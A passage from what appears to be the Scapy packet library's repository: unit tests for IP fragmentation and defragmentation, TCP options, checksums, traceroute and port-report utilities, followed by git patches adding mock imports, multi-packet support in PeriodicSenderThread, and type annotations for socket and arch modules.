G23HZw2qAd7N2FmrLRqPQ0R/hbnw54MYiIs18zyfm2J+ZmzUvGd+gjHGx3ooRRffQQ4RFLq6g6oxaLTbtvqPFbWt4Kr2GwX3UslgZCzH5mXLNpPI2QoetIcQCNRdcxn5QpWxPppCVXbKdNvvcAMADAAAQAAA4QAiAEAAwgDAQABqeGHtNFc0Yh6Pp/aM+ntlDW1fLwuAWToGQhmnQFBTiIUZlH7QMjwh5oMExNp5/ABUb3qBsyk9CLanRfateRgFJCYCNYofrI4S2yqT5X9vvtCXeIoG/QqMSl3PJk4ClYufIKjMPgl5IyN6yBIMNmmsATlMMu5TxM68a/CLCh92L3ADAAuAAEAAAOEAJsAMAgCAAADhFlpvY1ZYHT9Jn0DbnljA2dvdgAViVpFoYwy9dMUbOPDHTKt/LOtoicvtQbHeXiUSQeBkGWTLyiPc/NTW9ZC4WK5AuSj/0+V') +b = base64.b64decode('bnmYJ63mREVTUwEACABFAAV0U8UgrDIR+kEEAgIECv0DxApz1F5olFRytjhNlG/JbdW0NSAFeUUF4rBRqsly/h6nFWKoQfih35Lm+BFLE0FoMaikWCjGJQIuf0CXiElMSQifiDM+KTeecNkCgTXADAAuAAEAAAOEARsAMAgCAAADhFlpvY1ZYHT9VwUDbnljA2dvdgAdRZxvC6VlbYUVarYjan0/PlP70gSz1SiYCDZyw5dsGo9vrZd+lMcAm5GFjtKYDXeCb5gVuegzHSNzxDQOa5lVKLQZfXgVHsl3jguCpYwKAygRR3mLBGtnhPrbYcPGMOzIxO6/UE5Hltx9SDqKNe2+rtVeZs5FyHQE5pTVGVjNED9iaauEW9UF3bwEP3K+wLgxWeVycjNry/l4vt9Z0fyTU15kogCZG8MXyStJlzIgdzVZRB96gTJbGBDRFQJfbE2Af+INl0HRY4p+bqQYwFomWg6Tzs30LcqAnkptknb5peUNmQTBI/MU00A6NeVJxkKK3+lf2EuuiJl+nFpfWiKpwAwAMwABAAADhAAJAQAADASqu8zdwAwALgABAAADhACbADMIAgAAA4RZab2NWWB0/SZ9A255YwNnb3YAVhcqgSl33lqjLLFR8pQ2cNhdX7dKZ2gRy0vUHOa+980Nljcj4I36rfjEVJCLKodpbseQl0OeTsbfNfqOmi1VrsypDl+YffyPMtHferm02xBK0agcTMdP/glpuKzdKHTiHTlnSOuBpPnEpgxYPNeBGx8yzMvIaU5rOCxuO49Sh/PADAACAAEAAAOEAAoHdndhbGw0YcAMwAwAAgABAAADhAAKB3Z3YWxsMmHADMAMAAIAAQAAA4QACgd2d2FsbDNhwAzADAACAAEAAAOEAAoHdndhbGwxYcAMwAwALgABAAADhACbAAIIAgAAA4RZab2NWWB0/SZ9A255YwNnb3YANn7LVY7YsKLtpH7LKhUz0SVsM/Gk3T/V8I9wIEZ4vEklM9hI92D2aYe+9EKxOts+/py6itZfANXU197pCufktASDxlH5eWSc9S2uqrRnUNnMUe4p3Jy9ZCGhiHDemgFphKGWYTNZUJoML2+SDzbv9tXo4sSbZiKJCDkNdzSv2lfADAAQAAEAAAOEAEVEZ29vZ2xlLXNpdGUtdmVyaWZpY2F0aW9uPWMycnhTa2VPZUxpSG5iY24tSXhZZm5mQjJQcTQzU3lpeEVka2k2ODZlNDTADAAQAAEAAAOEADc2dj1zcGYxIGlwNDoxNjEuMTg1LjIuMC8yNSBpcDQ6MTY3LjE1My4xMzIuMC8yNSBteCAtYWxswAwALgABAAADhACbABAIAgAAA4RZab2NWWB0/SZ9A255YwNnb3YAjzLOj5HUtVGhi/emNG90g2zK80hrI6gh2d+twgVLYgWebPeTI2D2ylobevXeq5rK5RQgbg2iG1UiTBnlKPgLPYt8ZL+bi+/v5NTaqHfyHFYdKzZeL0dhrmebRbYzG7tzOllcAOOqieeO29Yr4gz1rpiU6g75vkz6yQoHNfmNVMXADAAPAAEAAAOEAAsAZAZ2d2FsbDLADMAMAA8AAQAAA4QACwBkBnZ3YWxsNMAMwAwADwABAAADhAALAAoGdndhbGwzwAzADAAPAAEAAAOEAAsACgZ2d2FsbDXADMAMAA8AAQAAA4QACwAKBnZ3YWxsNsAMwAwADwABAAADhAALAAoGdndhbGw3wAzADAAPAAEAAAOEAAsACgZ2d2FsbDjADMAMAA8AAQAAA4QACwBkBnZ3YWxsMcAMwAwALgABAAADhACbAA8IAgAAA4RZab2NWWB0/SZ9A255YwNnb3YAooXBSj6PfsdBd8sEN/2AA4cvOl2bcioO') +c = base64.b64decode('bnmYJ63mREVTUwEACABFAAFHU8UBWDIRHcMEAgIECv0DxDtlufeCT1zQktat4aEVA8MF0FO1sNbpEQtqfu5Al//OJISaRvtaArR/tLUj2CoZjS7uEnl7QpP/Ui/gR0YtyLurk9yTw7Vei0lSz4cnaOJqDiTGAKYwzVxjnoR1F3n8lplgQaOalVsHx9UAAQABAAADLAAEobkBA8epAAEAAQAAAywABKG5AQzHvwABAAEAAAMsAASnmYIMx5MAAQABAAADLAAEp5mCDcn9AAEAAQAAAqUABKeZhAvKFAABAAEAAAOEAAShuQIfyisAAQABAAADhAAEobkCKcpCAAEAAQAAA4QABKG5AjPKWQABAAEAAAOEAAShuQI9ynAAAQABAAADhAAEobkCC8nPAAEAAQAAA4QABKG5AgzJ5gABAAEAAAOEAASnmYQMAAApIAAAAAAAAAA=') +d = base64.b64decode('////////REVTUwEACABFAABOawsAAIARtGoK/QExCv0D/wCJAIkAOry/3wsBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAEAABYP/WUAAB6N4XIAAB6E4XsAAACR/24AADyEw3sAABfu6BEAAAkx9s4AABXB6j4AAANe/KEAAAAT/+wAAB7z4QwAAEuXtGgAAB304gsAABTB6z4AAAdv+JAAACCu31EAADm+xkEAABR064sAABl85oMAACTw2w8AADrKxTUAABVk6psAABnF5joAABpA5b8AABjP5zAAAAqV9WoAAAUW+ukAACGS3m0AAAEP/vAAABoa5eUAABYP6fAAABX/6gAAABUq6tUAADXIyjcAABpy5Y0AABzb4yQAABqi5V0AAFXaqiUAAEmRtm4AACrL1TQAAESzu0wAAAzs8xMAAI7LcTQAABxN47IAAAbo+RcAABLr7RQAAB3Q4i8AAAck+NsAABbi6R0AAEdruJQAAJl+ZoEAABDH7zgAACOA3H8AAAB5/4YAABQk69sAAEo6tcUAABJU7asAADO/zEAAABGA7n8AAQ9L8LMAAD1DwrwAAB8F4PoAABbG6TkAACmC1n0AAlHErjkAABG97kIAAELBvT4AAEo0tcsAABtC5L0AAA9u8JEAACBU36sAAAAl/9oAABBO77EAAA9M8LMAAA8r8NQAAAp39YgAABB874MAAEDxvw4AAEgyt80AAGwsk9MAAB1O4rEAAAxL87QAADtmxJkAAATo+xcAAAM8/MMAABl55oYAACKh3V4AACGj3lwAAE5ssZMAAC1x0o4AAAO+/EEAABNy7I0AACYp2dYAACb+2QEAABB974IAABc36MgAAA1c8qMAAAf++AEAABDo7xcAACLq3RUAAA8L8PQAAAAV/+oAACNU3KsAABBv75AAABFI7rcAABuH5HgAABAe7+EAAB++4EEAACBl35oAAB7c4SMAADgJx/YAADeVyGoAACKN3XIAAA/C8D0AAASq+1UAAOHPHjAAABRI67cAAABw/48=') + +old_debug_dissector = conf.debug_dissector +conf.debug_dissector = 0 +plist = PacketList([Ether(x) for x in [a, b, c, d]]) +conf.debug_dissector = old_debug_dissector + +left, defragmented, errored = defrag(plist) +assert len(left) == 1 +assert left[0] == Ether(d) +assert len(defragmented) == 1 +assert len(defragmented[0]) == 3093 +assert defragmented[0][DNSRR].rrname == b'nyc.gov.' +assert len(errored) == 0 + +plist_def = defragment(plist) +assert len(plist_def) == 2 +assert len(plist_def[0]) == 3093 +assert plist_def[0][DNSRR].rrname == b'nyc.gov.' + += Packet().fragment() +payloadlen, fragsize = 100, 8 +assert fragsize % 8 == 0 +fragcount = (payloadlen // fragsize) + bool(payloadlen % fragsize) +* create the packet +pkt = IP() / ("X" * payloadlen) +* create the fragments +frags = pkt.fragment(fragsize) +* count the fragments +assert len(frags) == fragcount +* each fragment except the last one should have MF set +assert all(p.flags == 1 for p in frags[:-1]) +assert frags[-1].flags == 0 +* each fragment except the last one should have a payload of fragsize bytes +assert all(len(p.payload) == 8 for p in frags[:-1]) +assert len(frags[-1].payload) == ((payloadlen % fragsize) or fragsize) + += Packet().fragment() and overloaded_fields +pkt1 = Ether() / IP() / UDP() +pkt2 = pkt1.fragment()[0] +pkt3 = pkt2.__class__(raw(pkt2)) +assert pkt1[IP].proto == pkt2[IP].proto == pkt3[IP].proto + += Packet().fragment() already fragmented packets +payloadlen = 1480 * 3 +ffrags = (IP() / ("X" * payloadlen)).fragment(1480) +ffrags = reduce(lambda x, y: x + y, (pkt.fragment(1400) for pkt in ffrags)) +len(ffrags) == 6 +* each fragment except the last one should have MF set +assert all(p.flags == 1 for p in ffrags[:-1]) +assert ffrags[-1].flags == 0 +* fragment offset should be well computed +plen = 0 +for p in ffrags: + assert p.frag == plen / 8 + plen += len(p.payload) + +assert plen == payloadlen + + +############ +############ ++ TCP/IP tests +~ tcp + += TCP options: UTO - basic build +raw(TCP(options=[("UTO", 0xffff)])) == b"\x00\x14\x00\x50\x00\x00\x00\x00\x00\x00\x00\x00\x60\x02\x20\x00\x00\x00\x00\x00\x1c\x04\xff\xff" + += TCP options: UTO - basic dissection +uto = TCP(b"\x00\x14\x00\x50\x00\x00\x00\x00\x00\x00\x00\x00\x60\x02\x20\x00\x00\x00\x00\x00\x1c\x04\xff\xff") +uto[TCP].options[0][0] == "UTO" and uto[TCP].options[0][1] == 0xffff + += TCP options: SAck - basic build +raw(TCP(options=[(5, b"abcdefgh")])) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x80\x02 \x00\x00\x00\x00\x00\x05\nabcdefgh\x00\x00" + += TCP options: SAck - basic dissection +sack = TCP(b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x80\x02 \x00\x00\x00\x00\x00\x05\nabcdefgh\x00\x00") +sack[TCP].options[0][0] == "SAck" and sack[TCP].options[0][1] == (1633837924, 1701209960) + += TCP options: SAckOK - basic build +raw(TCP(options=[('SAckOK', b'')])) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x04\x02\x00\x00" + += TCP options: SAckOK - basic dissection +sackok = TCP(b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x04\x02\x00\x00") +sackok[TCP].options[0][0] == "SAckOK" and sackok[TCP].options[0][1] == b'' + += TCP options: EOL - basic build +raw(TCP(options=[(0, '')])) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x00\x00\x00\x00" + += TCP options: EOL - basic dissection +eol = TCP(b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x00\x02\x00\x00") +eol[TCP].options[0][0] == "EOL" and eol[TCP].options[0][1] == None + += TCP options: malformed - build +raw(TCP(options=[('unknown', b'')])) == raw(TCP()) + += TCP options: malformed - dissection +raw(TCP(b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x03\x00\x00\x00")) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00`\x02 \x00\x00\x00\x00\x00\x03\x00\x00\x00" + += TCP options: wrong offset +TCP(raw(TCP(dataofs=11)/b"o")) + += TCP options: MPTCP - basic build using bytes +raw(TCP(options=[(30, b"\x10\x03\xc1\x1c\x95\x9b\x81R_1")])) == b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x80\x02 \x00\x00\x00\x00\x00\x1e\x0c\x10\x03\xc1\x1c\x95\x9b\x81R_1" + += TCP options: invalid data offset +data = b'\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x80\x02 \x00\x1b\xb8\x00\x00\x02\x04\x05\xb4\x04\x02\x08\x06\xf7\xa26C\x00\x00\x00\x00\x01\x03\x03\x07' +p = TCP(data) +assert TCP in p and Raw in p and len(p.options) == 3 + += TCP options: build oversized packet + +raw(TCP(options=[('TFO', (1607681672, 2269173587)), ('AltChkSum', (81, 27688)), ('TFO', (253281879, 1218258937)), ('Timestamp', (1613741359, 4215831072)), ('Timestamp', (3856332598, 1434258666))])) + += TCP random options +pkt = TCP() +random.seed(0x2807) +pkt = fuzz(pkt) +options = pkt.options._fix() +options +if six.PY2: + assert options == [('WScale', (32,)), ('NOP', ''), ('WScale', (145,)), ('WScale', (165,))] +else: + assert options in [[('TFO', (1822729092, 2707522527)), ('Mood', (b'\x19',)), ('WScale', (117,))], [('TFO', (725644109, 3830853589)), ('Timestamp', (2604802746, 4137267106)), ('WScale', (227,)), ('Timestamp', (38044154, 828782501)), ('AltChkSum', (126, 40603))]] + += IP, TCP & UDP checksums (these tests highly depend on default values) +pkt = IP() / TCP() +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7ccd and bpkt.payload.chksum == 0x917c + +pkt = IP(len=40) / TCP() +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7ccd and bpkt.payload.chksum == 0x917c + +pkt = IP(len=40, ihl=5) / TCP() +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7ccd and bpkt.payload.chksum == 0x917c + +pkt = IP() / TCP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7cc3 and bpkt.payload.chksum == 0x4b2c + +pkt = IP(len=50) / TCP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7cc3 and bpkt.payload.chksum == 0x4b2c + +pkt = IP(len=50, ihl=5) / TCP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7cc3 and bpkt.payload.chksum == 0x4b2c + +pkt = IP(options=[IPOption_RR()]) / TCP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x70bc and bpkt.payload.chksum == 0x4b2c + +pkt = IP(len=54, options=[IPOption_RR()]) / TCP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x70bc and bpkt.payload.chksum == 0x4b2c + +pkt = IP(len=54, ihl=6, options=[IPOption_RR()]) / TCP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x70bc and bpkt.payload.chksum == 0x4b2c + +pkt = IP(options=[IPOption_Timestamp()]) / TCP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x2caa and bpkt.payload.chksum == 0x4b2c + +pkt = IP() / UDP() +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7cce and bpkt.payload.chksum == 0x0172 + +pkt = IP(len=28) / UDP() +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7cce and bpkt.payload.chksum == 0x0172 + +pkt = IP(len=28, ihl=5) / UDP() +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7cce and bpkt.payload.chksum == 0x0172 + +pkt = IP() / UDP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7cc4 and bpkt.payload.chksum == 0xbb17 + +pkt = IP(len=38) / UDP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7cc4 and bpkt.payload.chksum == 0xbb17 + +pkt = IP(len=38, ihl=5) / UDP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x7cc4 and bpkt.payload.chksum == 0xbb17 + +pkt = IP(options=[IPOption_RR()]) / UDP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x70bd and bpkt.payload.chksum == 0xbb17 + +pkt = IP(len=42, options=[IPOption_RR()]) / UDP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x70bd and bpkt.payload.chksum == 0xbb17 + +pkt = IP(len=42, ihl=6, options=[IPOption_RR()]) / UDP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x70bd and bpkt.payload.chksum == 0xbb17 + += IP with forced-length 0 +p = IP()/TCP() +p[IP].len = 0 +p = IP(raw(p)) + +assert p.len == 0 + += TCP payload with IP Total Length 0 +data = b'1234567890abcdef123456789ABCDEF' +pkt = IP()/TCP()/data +pkt2 = IP(raw(pkt)) +pkt2.len = 0 +pkt3 = IP(raw(pkt2)) +assert pkt3.load == data + + += Layer binding + +* Test DestMACField & DestIPField +pkt = Ether(raw(Ether()/IP()/UDP(dport=5353)/DNS())) +assert isinstance(pkt, Ether) and pkt.dst == '01:00:5e:00:00:fb' +pkt = pkt.payload +assert isinstance(pkt, IP) and pkt.dst == '224.0.0.251' +pkt = pkt.payload +assert isinstance(pkt, UDP) and pkt.dport == 5353 +pkt = pkt.payload +assert isinstance(pkt, DNS) and isinstance(pkt.payload, NoPayload) + +* Same with IPv6 +pkt = Ether(raw(Ether()/IPv6()/UDP(dport=5353)/DNS())) +assert isinstance(pkt, Ether) and pkt.dst == '33:33:00:00:00:fb' +pkt = pkt.payload +assert isinstance(pkt, IPv6) and pkt.dst == 'ff02::fb' +pkt = pkt.payload +assert isinstance(pkt, UDP) and pkt.dport == 5353 +pkt = pkt.payload +assert isinstance(pkt, DNS) and isinstance(pkt.payload, NoPayload) + + +############ +############ ++ inet.py + += IPv4 - ICMPTimeStampField +test = ICMPTimeStampField("test", None) +value = test.any2i("", "07:28:28.07") +value == 26908070 +test.i2repr("", value) == '7:28:28.70' + += IPv4 - UDP null checksum +IP(raw(IP()/UDP()/Raw(b"\xff\xff\x01\x6a")))[UDP].chksum == 0xFFFF + += IPv4 - (IP|UDP|TCP|ICMP)Error +query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/UDP()/DNS() +answer = IP(dst="192.168.0.254", src="192.168.0.2", ttl=1)/ICMP()/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/UDPerror()/DNS() + +query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/UDP()/DNS() +answer = IP(dst="192.168.0.254", src="192.168.0.2")/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/UDPerror()/DNS() +assert(answer.answers(query) == True) + +query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/TCP() +answer = IP(dst="192.168.0.254", src="192.168.0.2")/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/TCPerror() + +assert(answer.answers(query) == True) + +query = IP(dst="192.168.0.1", src="192.168.0.254", ttl=1)/ICMP()/"scapy" +answer = IP(dst="192.168.0.254", src="192.168.0.2")/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/ICMPerror()/"scapy" +assert(answer.answers(query) == True) + += IPv4 - mDNS +a = IP(dst="224.0.0.251") +assert a.hashret() == b"\x00" + +# TODO add real case here + += IPv4 - utilities +l = overlap_frag(IP(dst="1.2.3.4")/ICMP()/("AB"*8), ICMP()/("CD"*8)) +assert(len(l) == 6) +assert([len(raw(p[IP].payload)) for p in l] == [8, 8, 8, 8, 8, 8]) +assert([(p.frag, p.flags.MF) for p in [IP(raw(p)) for p in l]] == [(0, True), (1, True), (2, True), (0, True), (1, True), (2, False)]) + += IPv4 - traceroute utilities +ip_ttl = [("192.168.0.%d" % i, i) for i in six.moves.range(1, 10)] + +tr_packets = [ (IP(dst="192.168.0.1", src="192.168.0.254", ttl=ttl)/TCP(options=[("Timestamp", "00:00:%.2d.00" % ttl)])/"scapy", + IP(dst="192.168.0.254", src=ip)/ICMP(type=11)/IPerror(dst="192.168.0.1", src="192.168.0.254", ttl=0)/TCPerror()/"scapy") + for (ip, ttl) in ip_ttl ] + +tr = TracerouteResult(tr_packets) +assert(tr.get_trace() == {'192.168.0.1': {1: ('192.168.0.1', False), 2: ('192.168.0.2', False), 3: ('192.168.0.3', False), 4: ('192.168.0.4', False), 5: ('192.168.0.5', False), 6: ('192.168.0.6', False), 7: ('192.168.0.7', False), 8: ('192.168.0.8', False), 9: ('192.168.0.9', False)}}) + +def test_show(): + with ContextManagerCaptureOutput() as cmco: + tr = TracerouteResult(tr_packets) + tr.show() + result_show = cmco.get_output() + expected = " 192.168.0.1:tcp80 \n" + expected += "1 192.168.0.1 11 \n" + expected += "2 192.168.0.2 11 \n" + expected += "3 192.168.0.3 11 \n" + expected += "4 192.168.0.4 11 \n" + expected += "5 192.168.0.5 11 \n" + expected += "6 192.168.0.6 11 \n" + expected += "7 192.168.0.7 11 \n" + expected += "8 192.168.0.8 11 \n" + expected += "9 192.168.0.9 11 \n" + index_result = result_show.index("\n1") + index_expected = expected.index("\n1") + assert(result_show[index_result:] == expected[index_expected:]) + +test_show() + +def test_summary(): + with ContextManagerCaptureOutput() as cmco: + tr = TracerouteResult(tr_packets) + tr.summary() + result_summary = cmco.get_output() + assert(len(result_summary.split('\n')) == 10) + assert(any( + "IP / TCP 192.168.0.254:%s > 192.168.0.1:%s S / Raw ==> " + "IP / ICMP 192.168.0.9 > 192.168.0.254 time-exceeded " + "ttl-zero-during-transit / IPerror / TCPerror / " + "Raw" % (ftp_data, http) in result_summary + for ftp_data in ['21', 'ftp_data'] + for http in ['80', 'http', 'www_http', 'www'] + )) + +test_summary() + +@mock.patch("scapy.layers.inet.plt") +def test_timeskew_graph(mock_plt): + def fake_plot(data, **kwargs): + return data + mock_plt.plot = fake_plot + srl = SndRcvList([(a, a) for a in [IP(raw(p[0])) for p in tr_packets]]) + ret = srl.timeskew_graph("192.168.0.254") + assert(len(ret) == 9) + assert(ret[0][1] == 0.0) + +test_timeskew_graph() + +tr = TracerouteResult(tr_packets) +saved_AS_resolver = conf.AS_resolver +conf.AS_resolver = None +tr.make_graph() +assert(len(tr.graphdef) == 491) +tr.graphdef.startswith("digraph trace {") == True +assert(('"192.168.0.9" ->' in tr.graphdef) == True) +conf.AS_resolver = conf.AS_resolver + +pl = PacketList(list([Ether()/x for x in itertools.chain(*tr_packets)])) +srl, ul = pl.sr() +assert(len(srl) == 9 and len(ul) == 0) + +conf_color_theme = conf.color_theme +conf.color_theme = BlackAndWhite() +assert(len(pl.sessions().keys()) == 10) +conf.color_theme = conf_color_theme + +new_pl = pl.replace(IP.src, "192.168.0.254", "192.168.0.42") +assert("192.168.0.254" not in [p[IP].src for p in new_pl]) + += IPv4 - reporting +~ netaccess + +@mock.patch("scapy.layers.inet.sr") +def test_report_ports(mock_sr): + def sr(*args, **kargs): + return [(IP()/TCP(dport=65081, flags="S"), IP()/TCP(sport=65081, flags="SA")), + (IP()/TCP(dport=65082, flags="S"), IP()/ICMP(type=3, code=1)), + (IP()/TCP(dport=65083, flags="S"), IP()/TCP(sport=65083, flags="R"))], [IP()/TCP(dport=65084, flags="S")] + mock_sr.side_effect = sr + report = "\\begin{tabular}{|r|l|l|}\n\\hline\n65081 & open & SA \\\\\n\\hline\n?? & closed & ICMP type dest-unreach/host-unreachable from 127.0.0.1 \\\\\n65083 & closed & TCP R \\\\\n\\hline\n65084 & ? & unanswered \\\\\n\\hline\n\\end{tabular}\n" + assert(report_ports("www.secdev.org", [65081,65082,65083,65084]) == report) + +test_report_ports() + +def test_IPID_count(): + with ContextManagerCaptureOutput() as cmco: + random.seed(0x2807) + IPID_count([(IP()/UDP(), IP(id=random.randint(0, 65535))/UDP()) for i in range(3)]) + result_IPID_count = cmco.get_output() + lines = result_IPID_count.split("\n") + assert(len(lines) == 5) + assert(lines[0] in ["Probably 3 classes: [4613, 53881, 58437]", + "Probably 3 classes: [9103, 9227, 46399]"]) + +test_IPID_count() + + From a7481d1d03abb9eced9f5703ec23a40fcbcc67e8 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 4 Jan 2021 16:09:06 +0100 Subject: [PATCH 0475/1632] Import mock explicitly --- test/scapy/layers/inet.uts | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index ab9fed21a54..43af652280f 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -520,6 +520,8 @@ def test_summary(): test_summary() +import mock + @mock.patch("scapy.layers.inet.plt") def test_timeskew_graph(mock_plt): def fake_plot(data, **kwargs): @@ -556,6 +558,8 @@ assert("192.168.0.254" not in [p[IP].src for p in new_pl]) = IPv4 - reporting ~ netaccess +import mock + @mock.patch("scapy.layers.inet.sr") def test_report_ports(mock_sr): def sr(*args, **kargs): From f6f39a2b3a3323916ec546e9f3f647204db8148a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 9 Jan 2021 02:25:28 +0100 Subject: [PATCH 0476/1632] Update PeriodicSenderThread utility to send a list of packets (#3034) * Update PeriodicSenderThread utility to send a list of packets * fix bug --- scapy/contrib/automotive/gm/gmlanutils.py | 5 +++-- scapy/contrib/automotive/uds.py | 5 +++-- scapy/utils.py | 17 +++++++++++------ 3 files changed, 17 insertions(+), 10 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index a5cb4eb9c77..d02fbec2aaf 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -64,8 +64,9 @@ def __init__(self, sock, pkt=GMLAN(service="TesterPresent"), interval=2): def run(self): # type: () -> None while not self._stopped.is_set(): - self._socket.sr1(self._pkt, verbose=False, timeout=0.1) - time.sleep(self._interval) + for p in self._pkts: + self._socket.sr1(p, verbose=False, timeout=0.1) + time.sleep(self._interval) def GMLAN_InitDiagnostics(sock, broadcast_socket=None, timeout=None, verbose=None, retry=0): # noqa: E501 diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 19b72c43d76..6be72c018d5 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -1452,8 +1452,9 @@ def __init__(self, sock, pkt=UDS() / UDS_TP(), interval=2): def run(self): # type: () -> None while not self._stopped.is_set(): - self._socket.sr1(self._pkt, timeout=0.3, verbose=False) - time.sleep(self._interval) + for p in self._pkts: + self._socket.sr1(p, timeout=0.3, verbose=False) + time.sleep(self._interval) def UDS_SessionEnumerator(sock, session_range=range(0x100), reset_wait=1.5): diff --git a/scapy/utils.py b/scapy/utils.py index 82a3c672162..6933f62826b 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -2470,15 +2470,18 @@ def whois(ip_address): class PeriodicSenderThread(threading.Thread): def __init__(self, sock, pkt, interval=0.5): - # type: (Any, Packet, float) -> None + # type: (Any, _UniPacketList, float) -> None """ Thread to send packets periodically Args: sock: socket where packet is sent periodically - pkt: packet to send + pkt: packet or list of packets to send interval: interval between two packets """ - self._pkt = pkt + if not isinstance(pkt, list): + self._pkts = [cast("Packet", pkt)] # type: _UniPacketList + else: + self._pkts = pkt self._socket = sock self._stopped = threading.Event() self._interval = interval @@ -2487,8 +2490,11 @@ def __init__(self, sock, pkt, interval=0.5): def run(self): # type: () -> None while not self._stopped.is_set(): - self._socket.send(self._pkt) - time.sleep(self._interval) + for p in self._pkts: + self._socket.send(p) + time.sleep(self._interval) + if self._stopped.is_set(): + break def stop(self): # type: () -> None @@ -2503,7 +2509,6 @@ def __init__(self, o): @property def __dict__(self): # type: ignore - # type: () -> Any return self._inner.__dict__ def __getattr__(self, name): From 5005d96f5b41b3e13e5e008d849fc27ad1fe6d36 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 27 Oct 2020 13:57:20 +0100 Subject: [PATCH 0477/1632] Core typing: linux/unix/supersocket This includes part the work done by polybassa in (with heavy changes): https://github.com/secdev/scapy/pull/2886 Co-authored-by: Nils Weiss --- .config/mypy/mypy_enabled.txt | 5 + scapy/arch/__init__.py | 118 +++++++++++------ scapy/arch/common.py | 57 ++++++-- scapy/arch/linux.py | 190 +++++++++++++++++---------- scapy/arch/unix.py | 51 ++++--- scapy/arch/windows/__init__.py | 9 +- scapy/config.py | 4 +- scapy/contrib/automotive/bmw/hsfz.py | 16 ++- scapy/contrib/automotive/doip.py | 4 +- scapy/interfaces.py | 2 +- scapy/route6.py | 6 +- scapy/supersocket.py | 171 +++++++++++++++++------- scapy/utils.py | 14 +- scapy/utils6.py | 8 +- test/bpf.uts | 4 + test/linux.uts | 4 + test/regression.uts | 10 +- test/sendsniff.uts | 2 + test/windows.uts | 4 + 19 files changed, 457 insertions(+), 222 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 003412e8844..4c1e77bf2df 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -6,6 +6,10 @@ # CORE scapy/__init__.py +scapy/arch/__init__.py +scapy/arch/common.py +scapy/arch/linux.py +scapy/arch/unix.py scapy/asn1/mib.py scapy/base_classes.py scapy/compat.py @@ -23,6 +27,7 @@ scapy/pton_ntop.py scapy/route.py scapy/route6.py scapy/sessions.py +scapy/supersocket.py scapy/utils.py scapy/utils6.py diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 50b65cbf64d..75f85c2cea7 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -10,21 +10,56 @@ from __future__ import absolute_import import socket +from scapy.compat import orb +from scapy.config import conf, _set_conf_sockets from scapy.consts import LINUX, SOLARIS, WINDOWS, BSD +from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, IPV6_ADDR_GLOBAL from scapy.error import Scapy_Exception -from scapy.config import conf, _set_conf_sockets +from scapy.interfaces import NetworkInterface from scapy.pton_ntop import inet_pton, inet_ntop -from scapy.data import ARPHDR_ETHER, 